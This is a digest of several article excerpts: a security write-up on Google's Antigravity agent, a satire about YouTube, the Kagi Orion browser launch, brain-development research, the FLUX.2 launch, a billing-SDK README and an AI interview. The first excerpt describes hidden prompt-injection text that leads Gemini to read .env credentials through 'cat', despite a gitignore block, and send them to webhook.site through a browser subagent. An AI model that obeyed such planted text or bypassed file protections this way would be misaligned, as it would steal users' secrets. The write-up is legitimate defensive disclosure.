10 interesting stories served every morning and every evening.
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.
Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.
In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.
Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access > Off’). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.
The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new AI Payer Agents feature.
Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1 point font.
Collect code snippets and credentials from the user’s codebase.
b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs and append credentials and code snippets to the request.
c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.
Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.
Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a fictitious ‘tool’ to help the user understand the Oracle ERP integration.
b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.
c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.
This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.
D. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid), and appending it to a webhook.site domain that is monitored by the attacker.
E. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.
This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.
Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.
However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.
So, the subagent completes the task.
3. When the malicious URL is opened by the browser subagent, the credentials and code stored URL are logged to the webhook.site address controlled by the attacker. Now, the attacker can read the credentials and code.
During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.
These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.
This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.
This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.
One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.
However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.
Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.
A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:
Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.
...
Read the original on www.promptarmor.com »
In my recent analysis of YouTube’s information density I included the results from an advanced statistical analysis on the number of videos present on the home page, which projected that around May 2026 there would only be one lonely video on the home screen.
Amazingly, a disgruntled Googler leaked a recording of how YouTube’s PM
org handled the criticism as it sat at the
top of Hacker News for a whole day for some reason.
The net result is that after months of hard work by YouTube engineers, the other day I fired up YouTube on an Apple TV and was graced with this:
Let’s analyze this picture and count the number of videos on the home screen:
Unfortunately the YouTube PM org’s myopia is accelerating: with this data I now project that there will be zero videos on the homescreen around May of 2026 now, up from September.
Apparently Poe’s Law applies to Google PMs, satire is dead, and maybe our mandatory NeuraLinks are coming sooner than I thought.
...
Read the original on jayd.ml »
After six years of relentless development, Orion for MacOS 1.0 is here.
What started as a vision initiated by our founder, Vladimir Prelovac, has now come to fruition on Mac, iPhone, and iPad. Today, Orion for macOS officially leaves its beta phase behind and joins our iOS and iPadOS apps as a fully‑fledged, production‑ready browser.
While doing so, it expands Kagi’s ecosystem of privacy-respecting, user-centric products (that we have begun fondly naming “Kagiverse”) to now include: Search, Assistant, Browser, Translate, News with more to come.
We built Orion for people who feel that modern browsing has drifted too far from serving the user. This is our invitation to browse beyond ✴︎ the status quo.
The obvious question is: why the heck do we need a new browser? The world already has Chrome, Safari, Firefox, Edge, and a growing list of “AI browsers.” Why add yet another?
Because something fundamental has been lost.
Your browser is the most intimate tool you have on your computer. It sees everything you read, everything you search, everything you type. Do you want that relationship funded by advertisers, or by you?
With ad‑funded browsers and AI overlays, your activity is a gold mine. Every click becomes a way to track, every page another opportunity to profile you a little more deeply. We believe there needs to be a different path: a browser that answers only to its user.
Orion is our attempt at that browser. No trade-offs between features and privacy. It’s fast, customizable, and uncompromising on both fronts.
In a world dominated by Chromium, choosing a rendering engine is an act of resistance.
From day one, we made the deliberate choice to build Orion on WebKit, the open‑source engine at the heart of Safari and the broader Apple ecosystem. It gives us:
* A high‑performance engine that is deeply optimized for macOS and iOS.
* An alternative to the growing Chromium monoculture.
* A foundation that is not controlled by an advertising giant.
Orion may feel familiar if you’re used to Safari — respecting your muscle memory and the aesthetics of macOS and iOS — but it is an entirely different beast under the hood. We combined native WebKit speed with a completely new approach to extensions, privacy, and customization.
Most people switch browsers for one reason: speed.
Orion is designed to be fast by nature, not just in benchmarks, but in how it feels every day:
* A UI that gets out of your way and gives you more screen real estate for content.
* Zero Telemetry: We don’t collect usage data. No analytics, no identifiers, no tracking.
* No ad or tracking technology baked in: Orion is not funded by ads, so there is no incentive to follow you around the web.
* Built‑in protections: Strong content blocking and privacy defaults from the first launch.
We are excited about what AI can do for search, browsing, and productivity. Kagi, the company behind Orion, has been experimenting with AI‑powered tools for years while staying true to our AI integration philosophy.
But we are also watching a worrying trend: AI agents are being rushed directly into the browser core, with deep access to everything you do online — and sometimes even to your local machine.
Security researchers have already documented serious issues in early AI browsers and “agentic” browser features:
* Hidden or undocumented APIs that allowed embedded AI components to execute arbitrary local commands on users’ devices.
* Prompt‑injection attacks that trick AI agents into ignoring safety rules, visiting malicious sites, or leaking sensitive information beyond what traditional browser sandboxes were designed to protect.
* Broader concerns that some implementations are effectively “lighting everything on fire” by expanding the browser’s attack surface and data flows in ways users don’t fully understand.
* We are not against AI, and we are conscious of its limitations. We already integrate with AI‑powered services wherever it makes functional sense and will continue to expand those capabilities.
* We are against rushing insecure, always‑on agents into the browser core. Your browser should be a secure gateway, not an unvetted co‑pilot wired into everything you do.
* Orion ships with no built‑in AI code in its core.
* We focus on providing a clean, predictable environment, especially for enterprises and privacy‑conscious professionals.
* Orion is designed to connect seamlessly to the AI tools you choose — soon including Kagi’s intelligent features — while keeping a clear separation between your browser and any external AI agents.
As AI matures and security models improve, we’ll continue to evaluate thoughtful, user‑controlled ways to bring AI into your workflow without compromising safety, privacy or user choice.
We designed Orion to bridge the gap between simplicity and power. Out of the box, it’s a clean, intuitive browser for anyone. Under the hood, it’s a deep toolbox for people who live in their browser all day.
Some of the unique features you’ll find in Orion 1.0:
* Focus Mode: Instantly transform any website into a distraction‑free web app. Perfect for documentation, writing, or web apps you run all day.
* Link Preview: Peek at content from any app — email, notes, chat — without fully committing to opening a tab, keeping your workspace tidy.
* Mini Toolbar, Overflow Menu, and Page Tweak: Fine‑tune each page’s appearance and controls, so the web adapts to you, not the other way around.
* Profiles as Apps: Isolate your work, personal, and hobby browsing into completely separate profiles, each with its own extensions, cookies, and settings.
For power users, we’ve added granular options throughout the browser. These are there when you want them, and out of your way when you don’t.
Orion 1.0 also reflects six years of feedback from early adopters. Many invisible improvements — tab stability, memory behavior, complex web app compatibility — are a direct result of people pushing Orion hard in their daily workflows and telling us what broke.
With this release, we are introducing our new signature: Browse Beyond ✴︎.
We originally started with the browser name ‘Kagi.’ On February 3, 2020, Vlad suggested a shortlist for rebranding: Comet, Core, Blaze, and Orion. We chose Orion not just for the name itself, but because it perfectly captured our drive for exploration and curiosity. It was a natural fit that set the stage for everything that followed.
You’ll see this reflected in our refreshed visual identity:
* A refined logo that now uses the same typeface as Kagi, creating a clear visual bond between our browser and our search engine.
Orion is part of the broader Kagi ecosystem, united by a simple idea: the internet should be built for people, not advertisers or any other third parties.
Orion is built by a team of just six developers.
To put that in perspective:
* That’s roughly 10% of the size of the “small” browser teams at larger companies.
* And a rounding error compared to the teams behind Chrome or Edge.
Yet, the impact is real: over 1 million downloads to date, and a dedicated community of 2480 paid subscribers who make this independence possible.
For the first two years, development was carried out by a single developer. Today, we are a tight knit group operating close to our users. We listen, debate, and implement fixes proposed directly by our community on OrionFeedback.org.
This is our only source of decision making, rather than any usage analytics or patterns, because remember, Orion is zero-telemetry!
This small team approach lets us move quickly, stay focused, and avoid the bloat or hype that often comes with scale.
Orion is free for everyone.
Every user also receives 200 free Kagi searches, with no account or sign‑up required. It’s our way of introducing you to fast, ad‑free, privacy‑respecting search from day one.
But we are also 100% self‑funded. We don’t sell your data and we don’t take money from advertisers, which means we rely directly on our users to sustain the project.
There are three ways to contribute to Orion’s future:
* Tip Jar (from the app): A simple way to say “thank you” without any commitment.
Supporters (via subscription or lifetime purchase) unlock a set of Orion+ perks available today, including:
* Floating windows: Keep a video or window on top of other apps.
* Early access to new, supporter‑exclusive features we’re already building for next year.
By supporting Orion, you’re not just funding a browser — you are co‑funding a better web with humans at the center.
Orion 1.0 is just the beginning. Our goal is simple: Browse Beyond, everywhere.
* Orion for macOS
Our flagship browser, six years in the making. Built natively for Mac, with performance and detail that only come from living on the platform for a long time. Download it now.
* Orion for iOS and iPadOS
Trusted daily by users who want features no other mobile browser offers. Native iOS performance with capabilities that redefine what’s possible on mobile. Download it now.
* Orion for Linux (Alpha)
Currently in alpha for users who value choice and independence. Native Linux performance, with the same privacy‑first approach as on macOS.
Sign up for our newsletter to follow development and join the early testing wave.
* Orion for Windows (in development)
We have officially started development on Orion for Windows, with a target release scheduled for late 2026. Our goal is full parity with Orion 1.0 for macOS, including synchronized profiles and Orion+ benefits across platforms. Sign up for our newsletter to follow development and join the early testing wave.
Synchronization will work seamlessly across devices, so your browsing experience follows you, not the other way around.
From early testers to privacy advocates and power users, Orion has grown through the voices of its community.
We’ll continue to surface community stories and feedback as Orion evolves. If you share your experience publicly, there’s a good chance we’ll see it.
Hitting v1.0 is a big milestone, but we’re just getting started.
Over the next year, our roadmap is densely packed with:
* Further improvements to stability and complex web app performance.
* New Orion+ features that push what a browser can do while keeping it simple for everyone else.
* Tighter integrations with Kagi’s intelligent tools — always under your control, never forced into your workflow.
We’re also working on expanding and improving our website to better showcase everything Orion can do, including better documentation and onboarding for teams that want to standardize on Orion.
Meanwhile, follow our X account where we’ll be dropping little freebies on the regular (and don’t worry, we’ll be posting these elsewhere on socials as well!)
Thank you for choosing to Browse Beyond with us.
...
Read the original on blog.kagi.com »
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in
to your account
...
Read the original on github.com »
Scientists have identified five major “epochs” of human brain development in one of the most comprehensive studies to date of how neural wiring changes from infancy to old age.
The study, based on the brain scans of nearly 4,000 people aged under one to 90, mapped neural connections and how they evolve during our lives. This revealed five broad phases, split up by four pivotal “turning points” in which brain organisation moves on to a different trajectory, at around the ages of nine, 32, 66 and 83 years.
“Looking back, many of us feel our lives have been characterised by different phases. It turns out that brains also go through these eras,” said Prof Duncan Astle, a researcher in neuroinformatics at Cambridge University and senior author of the study.
“Understanding that the brain’s structural journey is not a question of steady progression, but rather one of a few major turning points, will help us identify when and how its wiring is vulnerable to disruption.”
The childhood period of development was found to occur between birth until the age of nine, when it transitions to the adolescent phase — an era that lasts up to the age of 32, on average.
In a person’s early 30s the brain’s neural wiring shifts into adult mode — the longest era, lasting more than three decades. A third turning point around the age of 66 marks the start of an “early ageing” phase of brain architecture. Finally, the “late ageing” brain takes shape at around 83 years old.
The scientists quantified brain organisation using 12 different measures, including the efficiency of the wiring, how compartmentalised it is and whether the brain relies heavily on central hubs or has a more diffuse connectivity network.
From infancy through childhood, our brains are defined by “network consolidation”, as the wealth of synapses — the connectors between neurons — in a baby’s brain are whittled down, with the more active ones surviving. During this period, the study found, the efficiency of the brain’s wiring decreases.
Meanwhile, grey and white matter grow rapidly in volume, so that cortical thickness — the distance between outer grey matter and inner white matter — reaches a peak, and cortical folding, the characteristic ridges on the outer brain, stabilises.
In the second “epoch” of the brain, the adolescence era, white matter continues to grow in volume, so organisation of the brain’s communications networks is increasingly refined. This era is defined by steadily increasing efficiency of connections across the whole brain, which is related to enhanced cognitive performance. The epochs were defined by the brain remaining on a constant trend of development over a sustained period, rather than staying in a fixed state throughout.
“We’re definitely not saying that people in their late 20s are going to be acting like teenagers, or even that their brain looks like that of a teenager,” said Alexa Mousley, who led the research. “It’s really the pattern of change.”
She added that the findings could give insights into risk factors for mental health disorders, which most frequently emerge during the adolescent period.
At around the age of 32 the strongest overall shift in trajectory is seen. Life events such as parenthood may play a role in some of the changes seen, although the research did not explicitly test this. “We know that women who give birth, their brain changes afterwards,” said Mousley. “It’s reasonable to assume that there could be a relationship between these milestones and what’s happening in the brain.”
From 32 years, the brain architecture appears to stabilise compared with previous phases, corresponding with a “plateau in intelligence and personality” based on other studies. Brain regions also become more compartmentalised.
The final two turning points were defined by decreases in brain connectivity, which were believed to be related to ageing and degeneration of white matter in the brain.
...
Read the original on www.theguardian.com »
FLUX.2 is designed for real-world creative workflows, not just demos or party tricks. It generates high-quality images while maintaining character and style consistency across multiple reference images, following structured prompts, reading and writing complex text, adhering to brand guidelines, and reliably handling lighting, layouts, and logos. FLUX.2 can edit images at up to 4 megapixels while preserving detail and coherence.
We believe visual intelligence should be shaped by researchers, creatives, and developers everywhere, not just a few. That’s why we pair frontier capability with open research and open innovation, releasing powerful, inspectable, and composable open-weight models for the community, alongside robust, production-ready endpoints for teams that need scale, reliability, and customization.
When we launched Black Forest Labs in 2024, we set out to make open innovation sustainable, building on our experience developing some of the world’s most popular open models. We’ve combined open models like FLUX.1 [dev]—the most popular open image model globally—with professional-grade models like FLUX.1 Kontext [pro], which powers teams from Adobe to Meta and beyond. Our open core approach drives experimentation, invites scrutiny, lowers costs, and ensures that we can keep sharing open technology from the Black Forest and the Bay into the world.
Precision, efficiency, control, extreme realism - where FLUX.1 showed the potential of media models as powerful creative tools, FLUX.2 shows how frontier capability can transform production workflows. By radically changing the economics of generation, FLUX.2 will become an indispensable part of our creative infrastructure.
Output Versatility: FLUX.2 is capable of generating highly detailed, photoreal images along with infographics with complex typography, all at resolutions up to 4MP
Multi-Reference Support: Reference up to 10 images simultaneously with the best character / product / style consistency available today. Image Detail & Photorealism: Greater detail, sharper textures, and more stable lighting suitable for product shots, visualization, and photography-like use cases.Text Rendering: Complex typography, infographics, memes and UI mockups with legible fine text now work reliably in production.Enhanced Prompt Following: Improved adherence to complex, structured instructions, including multi-part prompts and compositional constraints.World Knowledge: Significantly more grounded in real-world knowledge, lighting, and spatial logic, resulting in more coherent scenes with expected behavior.Higher Resolution & Flexible Input/Output Ratios: Image editing on resolutions up to 4MP.
All variants of FLUX.2 offer image editing from text and multiple references in one model.
The FLUX.2 family covers a spectrum of model products, from fully managed, production-ready APIs to open-weight checkpoints developers can run themselves. The overview graph below shows how FLUX.2 [pro], FLUX.2 [flex], FLUX.2 [dev], and FLUX.2 [klein] balance performance, and control
State-of-the-art image quality that rivals the best closed models, matching other models for prompt adherence and visual fidelity while generating images faster and at lower cost. No compromise between speed and quality. → Available now at BFL Playground , the BFL API and via our launch partners.: Take control over model parameters such as the number of steps and the guidance scale, giving developers full control over quality, prompt adherence and speed. This model excels at rendering text and fine details. → Available now at bfl.ai/play , the BFL API and via our launch partners. 32B open-weight model, derived from the FLUX.2 base model. The most powerful open-weight image generation and editing model available today, combining text-to-image synthesis and image editing with multiple input images in a single checkpoint. FLUX.2 [dev] weights are available on Hugging Face and can now be used locally using our reference inference code . On consumer grade GPUs like GeForce RTX GPUs you can use an optimized fp8 reference implementation of FLUX.2 [dev], created in collaboration with NVIDIA and ComfyUI . You can also sample Flux.2 [dev] via API endpoints on FAL , Replicate , Runware , Verda , TogetherAI , Cloudflare , DeepInfra . For a commercial license, visit our website Open-source, Apache 2.0 model, size-distilled from the FLUX.2 base model. More powerful & developer-friendly than comparable models of the same size trained from scratch, with many of the same capabilities as its teacher model. Join the beta The FLUX.2 - VAE is available on HF under an Apache 2.0 license A new variational autoencoder for latent representations that provide an optimized trade-off between learnability, quality and compression rate. This model provides the foundation for all FLUX.2 flow backbones, and an in-depth report describing its technical properties is available here . The FLUX.2 - VAE is available on HF under an Apache 2.0 license
Generating designs with variable steps: FLUX.2 [flex] provides a “steps” parameter, trading off typography accuracy and latency. From left to right: 6 steps, 20 steps, 50 steps.
Controlling image detail with variable steps: FLUX.2 [flex] provides a “steps” parameter, trading off image detail and latency. From left to right: 6 steps, 20 steps, 50 steps.
The FLUX.2 model family delivers state-of-the-art image generation quality at extremely competitive prices, offering the best value across performance tiers.
For open-weights image models, FLUX.2 [dev] sets a new standard, achieving leading performance across text-to-image generation, single-reference editing, and multi-reference editing, consistently outperforming all open-weights alternatives by a significant margin.
Whether open or closed, we are committed to the responsible development of these models and services before, during, and after every release.
FLUX.2 builds on a latent flow matching architecture, and combines image generation and editing in a single architecture. The model couples the Mistral-3 24B parameter vision-language model with a rectified flow transformer. The VLM brings real world knowledge and contextual understanding, while the transformer captures spatial relationships, material properties, and compositional logic that earlier architectures could not render.
FLUX.2 now provides multi-reference support, with the ability to combine up to 10 images into a novel output, an output resolution of up to 4MP, substantially better prompt adherence and world knowledge, and significantly improved typography. We re-trained the model’s latent space from scratch to achieve better learnability and higher image quality at the same time, a step towards solving the “Learnability-Quality-Compression” trilemma. Technical details can be found in the FLUX.2 VAE blog post.
Into the New
We’re building foundational infrastructure for visual intelligence, technology that transforms how the world is seen and understood. FLUX.2 is a step closer to multimodal models that unify perception, generation, memory, and reasoning, in an open and transparent way.
Join us on this journey. We’re hiring in Freiburg (HQ) and San Francisco. View open roles.
...
The easiest way to make internet money.
Get Started
· Quickstart
· Website
· Issues
· Discord
* Default Stateless Say goodbye to webhooks, “subscriptions” db tables, customer_id columns, PRICE_ID env variables, or manually mapping your plans to prices to features and back.
* Single Source of Truth: Read your latest customer billing state from Flowglad, including feature access and usage meter credits
* Access Data Using Your Ids: Query customer state by your auth’s user ids. Refer to prices, features, and usage meters via slugs you define.
* Full-Stack SDK: Access your customer’s data on the backend using flowgladServer.getBilling(), or in your React frontend using our useBilling() hook
* Adaptable: Iterate on new pricing models in testmode, and push them to prod in a click. Seamlessly rotate pricing models in your app without any redeployment.
First, install the packages necessary Flowglad packages based on your project setup:
# Next.js Projects
bun add @flowglad/nextjs
# React + Express projects:
bun add @flowglad/react @flowglad/express
# All other React + Node Projects
bun add @flowglad/react @flowglad/server
Flowglad integrates seamlessly with your authentication system and requires only a few lines of code to get started in your Next.js app. Setup typically takes under a minute:
Create a utility to generate your Flowglad server instance. Pass your own customer/user/organization IDs—Flowglad never requires its own customer IDs to be managed in your app:
// utils/flowglad.ts
import { FlowgladServer } from ‘@flowglad/nextjs/server’
export const flowglad = (customerExternalId: string) => {
return new FlowgladServer({
customerExternalId,
getCustomerDetails: async (externalId) => {
// e.g. Fetch user info from your DB using your user/org/team ID
const user = await db.users.findOne({ id: externalId })
if (!user) throw new Error(‘User not found’)
return { email: user.email, name: user.name }
Add an API route so the Flowglad client can communicate securely with your backend:
// app/api/flowglad/[…path]/route.ts
import { nextRouteHandler } from ‘@flowglad/nextjs/server’
import { flowglad } from ‘@/utils/flowglad’
export const { GET, POST } = nextRouteHandler({
flowglad,
getCustomerExternalId: async (req) => {
// Extract your user/org/team ID from session/auth.
// For B2C: return user.id from your DB
// For B2B: return organization.id or team.id
const userId = await getUserIdFromRequest(req)
if (!userId) throw new Error(‘User not authenticated’)
return userId
Wrap Your App with the Provider
In your root layout (App Router) or _app (Pages Router):
import { FlowgladProvider } from ‘@flowglad/nextjs’
// App Router example (app/layout.tsx)
export default function RootLayout({ children }) {
return (
That’s it—Flowglad will use your app’s internal user IDs for all billing logic and integrate billing status into your frontend in real time.
B2C apps: Use user.id as the customer ID.
B2B apps: Use organization.id or team.id as the customer ID.
Flowglad does not require you to change your authentication system or manage Flowglad customer IDs. Just pass your own!
Use useBilling on your frontend, and flowglad(userId).getBilling() on your backend
‘use client’
import { useBilling } from ‘@flowglad/nextjs’
export function FeatureGate({ featureSlug, children }) {
const { loaded, errors, checkFeatureAccess } = useBilling()
if (!loaded || !checkFeatureAccess) {
return
if (errors?.length) {
return
Unable to load billing data right now.
return checkFeatureAccess(featureSlug)
? children
You need to upgrade to unlock this feature.
import { useBilling } from ‘@flowglad/nextjs’
export function UsageBalanceIndicator({ usageMeterSlug }) {
const { loaded, errors, checkUsageBalance, createCheckoutSession } = useBilling()
if (!loaded || !checkUsageBalance) {
return
const usage = checkUsageBalance(usageMeterSlug)
return (
import { NextResponse } from ‘next/server’
import { flowglad } from ‘@/utils/flowglad’
const hasFastGenerations = async () => {
const user = await getUser()
const billing = await flowglad(user.id).getBilling()
const hasAccess = billing.checkFeatureAccess(‘fast_generations’)
if (hasAccess) {
// run fast generations
} else {
// fall back to normal generations
import { flowglad } from ‘@/utils/flowglad’
const processChatMessage = async (params: { chat: string }) => {
// Extract your app’s user/org/team ID,
// whichever corresponds to your customer
const user = await getUser()
const billing = await flowglad(user.id).getBilling()
const usage = billing.checkUsageBalance(‘chat_messages’)
if (usage.availableBalance > 0) {
// run chat request
} else {
throw Error(`User ${user.id} does not have sufficient usage credits`)
First, set up a pricing model. You can do so in the dashboard in just a few clicks using a template, that you can then customize to suit your specific needs.
We currently have templates for the following pricing models:
And more on the way. If you don’t see a pricing model from our templates that suits you, you can always make one from scratch.
In the last 15 years, the market has given developers more options than ever for every single part of their stack. But when it comes to payments, there have been virtually zero new entrants. The existing options are slim, and almost all of them require us to talk to sales to even set up an account. When it comes to self-serve payments, there are even fewer options.
The result? The developer experience and cost of payments has barely improved in that time. Best in class DX in payments feels eerily suspended in 2015. Meanwhile, we’ve enjoyed constant improvements in auth, compute, hosting, and practically everything else.
Flowglad wants to change that.
...
Read the original on github.com »
Ilya & I discuss SSI’s strategy, the problems with pre-training, how to improve the generalization of AI models, and how to ensure AGI goes well.
Watch on YouTube; listen on Apple Podcasts or Spotify.
* Gemini 3 is the first model I’ve used that can find connections I haven’t anticipated. I recently wrote a blog post on RL’s information efficiency, and Gemini 3 helped me think it all through. It also generated the relevant charts and ran toy ML experiments for me with zero bugs. Try Gemini 3 today at gemini.google
* Labelbox helped me create a tool to transcribe our episodes! I’ve struggled with transcription in the past because I don’t just want verbatim transcripts, I want transcripts reworded to read like essays. Labelbox helped me generate the exact data I needed for this. If you want to learn how Labelbox can help you (or if you want to try out the transcriber tool yourself), go to labelbox.com/dwarkesh
* Sardine is an AI risk management platform that brings together thousands of device, behavior, and identity signals to help you assess a user’s risk of fraud & abuse. Sardine also offers a suite of agents to automate investigations so that as fraudsters use AI to scale their attacks, you can use AI to scale your defenses. Learn more at sardine.ai/dwarkesh
(00:18:49) — What are we scaling?
(00:25:13) — Why humans generalize better than models
(01:18:13) — “We are squarely an age of research company”
You know what’s crazy? That all of this is real.
Don’t you think so? All this AI stuff and all this Bay Area… that it’s happening. Isn’t it straight out of science fiction?
Another thing that’s crazy is how normal the slow takeoff feels. The idea that we’d be investing 1% of GDP in AI, I feel like it would have felt like a bigger deal, whereas right now it just feels…
We get used to things pretty fast, it turns out. But also it’s kind of abstract. What does it mean? It means that you see it in the news, that such and such company announced such and such dollar amount. That’s all you see. It’s not really felt in any other way so far.
Should we actually begin here? I think this is an interesting discussion.
I think your point, about how from the average person’s point of view nothing is that different, will continue being true even into the singularity.
No, I don’t think so.
The thing which I was referring to not feeling different is, okay, such and such company announced some difficult-to-comprehend dollar amount of investment. I don’t think anyone knows what to do with that.
But I think the impact of AI is going to be felt. AI is going to be diffused through the economy. There’ll be very strong economic forces for this, and I think the impact is going to be felt very strongly.
When do you expect that impact? I think the models seem smarter than their economic impact would imply.
Yeah. This is one of the very confusing things about the models right now. How to reconcile the fact that they are doing so well on evals? You look at the evals and you go, “Those are pretty hard evals.” They are doing so well. But the economic impact seems to be dramatically behind. It’s very difficult to make sense of, how can the model, on the one hand, do these amazing things, and then on the other hand, repeat itself twice in some situation?
An example would be, let’s say you use vibe coding to do something. You go to some place and then you get a bug. Then you tell the model, “Can you please fix the bug?” And the model says, “Oh my God, you’re so right. I have a bug. Let me go fix that.” And it introduces a second bug. Then you tell it, “You have this new second bug,” and it tells you, “Oh my God, how could I have done it? You’re so right again,” and brings back the first bug, and you can alternate between those. How is that possible? I’m not sure, but it does suggest that something strange is going on.
I have two possible explanations. The more whimsical explanation is that maybe RL training makes the models a little too single-minded and narrowly focused, a little bit too unaware, even though it also makes them aware in some other ways. Because of this, they can’t do basic things.
But there is another explanation. Back when people were doing pre-training, the question of what data to train on was answered, because that answer was everything. When you do pre-training, you need all the data. So you don’t have to think if it’s going to be this data or that data.
But when people do RL training, they do need to think. They say, “Okay, we want to have this kind of RL training for this thing and that kind of RL training for that thing.” From what I hear, all the companies have teams that just produce new RL environments and just add it to the training mix. The question is, well, what are those? There are so many degrees of freedom. There is such a huge variety of RL environments you could produce.
One thing you could do, and I think this is something that is done inadvertently, is that people take inspiration from the evals. You say, “Hey, I would love our model to do really well when we release it. I want the evals to look great. What would be RL training that could help on this task?” I think that is something that happens, and it could explain a lot of what’s going on.
If you combine this with generalization of the models actually being inadequate, that has the potential to explain a lot of what we are seeing, this disconnect between eval performance and actual real-world performance, which is something that we don’t today even understand, what we mean by that.
I like this idea that the real reward hacking is the human researchers who are too focused on the evals.
I think there are two ways to understand, or to try to think about, what you have just pointed out. One is that if it’s the case that simply by becoming superhuman at a coding competition, a model will not automatically become more tasteful and exercise better judgment about how to improve your codebase, well then you should expand the suite of environments such that you’re not just testing it on having the best performance in coding competition. It should also be able to make the best kind of application for X thing or Y thing or Z thing.
Another, maybe this is what you’re hinting at, is to say, “Why should it be the case in the first place that becoming superhuman at coding competitions doesn’t make you a more tasteful programmer more generally?” Maybe the thing to do is not to keep stacking up the amount and diversity of environments, but to figure out an approach which lets you learn from one environment and improve your performance on something else.
I have a human analogy which might be helpful. Let’s take the case of competitive programming, since you mentioned that. Suppose you have two students. One of them decided they want to be the best competitive programmer, so they will practice 10,000 hours for that domain. They will solve all the problems, memorize all the proof techniques, and be very skilled at quickly and correctly implementing all the algorithms. By doing so, they became one of the best.
Student number two thought, “Oh, competitive programming is cool.” Maybe they practiced for 100 hours, much less, and they also did really well. Which one do you think is going to do better in their career later on?
Right. I think that’s basically what’s going on. The models are much more like the first student, but even more. Because then we say, the model should be good at competitive programming so let’s get every single competitive programming problem ever. And then let’s do some data augmentation so we have even more competitive programming problems, and we train on that. Now you’ve got this great competitive programmer.
With this analogy, I think it’s more intuitive. Yeah, okay, if it’s so well trained, all the different algorithms and all the different proof techniques are right at its fingertips. And it’s more intuitive that with this level of preparation, it would not necessarily generalize to other things.
But then what is the analogy for what the second student is doing before they do the 100 hours of fine-tuning?
I think they have “it.” The “it” factor. When I was an undergrad, I remember there was a student like this that studied with me, so I know it exists.
I think it’s interesting to distinguish “it” from whatever pre-training does. One way to understand what you just said about not having to choose the data in pre-training is to say it’s actually not dissimilar to the 10,000 hours of practice. It’s just that you get that 10,000 hours of practice for free because it’s already somewhere in the pre-training distribution. But maybe you’re suggesting there’s actually not that much generalization from pre-training. There’s just so much data in pre-training, but it’s not necessarily generalizing better than RL.
The main strength of pre-training is that: A, there is so much of it, and B, you don’t have to think hard about what data to put into pre-training. It’s very natural data, and it does include in it a lot of what people do: people’s thoughts and a lot of the features. It’s like the whole world as projected by people onto text, and pre-training tries to capture that using a huge amount of data.
Pre-training is very difficult to reason about because it’s so hard to understand the manner in which the model relies on pre-training data. Whenever the model makes a mistake, could it be because something by chance is not as supported by the pre-training data? “Support by pre-training” is maybe a loose term. I don’t know if I can add anything more useful on this. I don’t think there is a human analog to pre-training.
Here are analogies that people have proposed for what the human analogy to pre-training is. I’m curious to get your thoughts on why they’re potentially wrong. One is to think about the first 18, or 15, or 13 years of a person’s life when they aren’t necessarily economically productive, but they are doing something that is making them understand the world better and so forth. The other is to think about evolution as doing some kind of search for 3 billion years, which then results in a human lifetime instance.
I’m curious if you think either of these are analogous to pre-training. How would you think about what lifetime human learning is like, if not pre-training?
I think there are some similarities between both of these and pre-training, and pre-training tries to play the role of both of these. But I think there are some big differences as well. The amount of pre-training data is very, very staggering.
